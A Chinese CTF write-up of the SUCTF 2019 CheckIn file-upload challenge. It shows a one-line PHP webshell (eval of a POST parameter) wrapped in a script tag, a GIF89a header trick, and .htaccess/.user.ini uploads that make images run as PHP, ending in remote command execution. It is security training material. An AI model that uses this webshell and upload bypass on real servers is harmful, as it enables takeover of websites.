[SUCTF 2019]CheckIn1

提示

  1. 一句话木马的多种变式(这里需要用到用javascript来写一句话木马)
  2. 注意修改文件头

先随意上传一个文件fuzz一下看能不能直接传webshell

从下面来看常见php后缀都不行,其中有一个没有加后缀过了后缀验证这一步,到了下一步,但是他还会看文件的内容不能有<?


首先不能是php文件就上传图片文件,再通过.htaccess和.user.ini来把图片文件当php运行

既然会过滤<? , 所以到这里就应该想到

  1. 用javascript来执行php <script language='php'>eval($_POST['a']);</script>

上传成功, 路径也返回出来了/uploads/c55e0cb61f7eb238df09ae30a206e5ee

接下来就要思考怎么传入.htaccess或者.user.ini了

先尝试传.htaccess

看样子因该是没有把.htaccess拉进黑名单可以传入, 但是看出来了不是图片文件(这里推断因该是会验证头信息)

这个就比较好处理, 在文件里最前面加入GIF89a他应该就会成功上传

注意, 无论什么时候content-type: 这个都是得注意的, 一般都会验证这里是否是图片类型

这里加上GIF89a尝试上传

上传成功

尝试访问上传的木马

如果不是出来的图片什么的, 就说明.htaceess起作用了, 这里用蚁剑或者菜刀之类的直接连就行了

在尝试传.user.ini

这里直接添加了文件头, 应为上面已经验证了

这里也成功上传

这里的代码意思所有的1.jpg文件都以php文件打开

所以最后两种方法都可以使用

尝试工具连接(蚁剑)

可行(记住得是上传文件的位置)

尝试rce

也是可行的

这里用的是hackbar火狐的插件

相关推荐
unable code3 小时前
浏览器取证-[GKCTF 2021]FireFox Forensics
网络安全·ctf·misc·1024程序员节·浏览器取证
сокол4 小时前
【网安-Web渗透测试-漏洞系列】文件包含&下载读取
web安全·php
月明长歌8 小时前
网络原理初识:从“几台电脑各干各的”到“数据包跨网段飞奔”的一整套思维模型
网络·计算机网络·电脑·php
unable code8 小时前
内存取证-[安洵杯 2019]Attack
网络安全·ctf·misc·1024程序员节·内存取证
сокол9 小时前
【网安-Web渗透测试-漏洞系列】文件上传漏洞
web安全·php
сокол9 小时前
【网安-Web渗透测试-漏洞系列】序列化漏洞
web安全·php
unable code19 小时前
CTF-SPCS-Forensics
网络安全·ctf·misc·1024程序员节·取证
zorro_z20 小时前
实战SimpleBlog(二):博客发布与管理
php
Chen--Xing1 天前
HGAME 2026 -- Crypto -- WriteUp
ctf·crypto·hgame
unable code2 天前
内存取证-卡比卡比卡比
网络安全·ctf·misc·1024程序员节·内存取证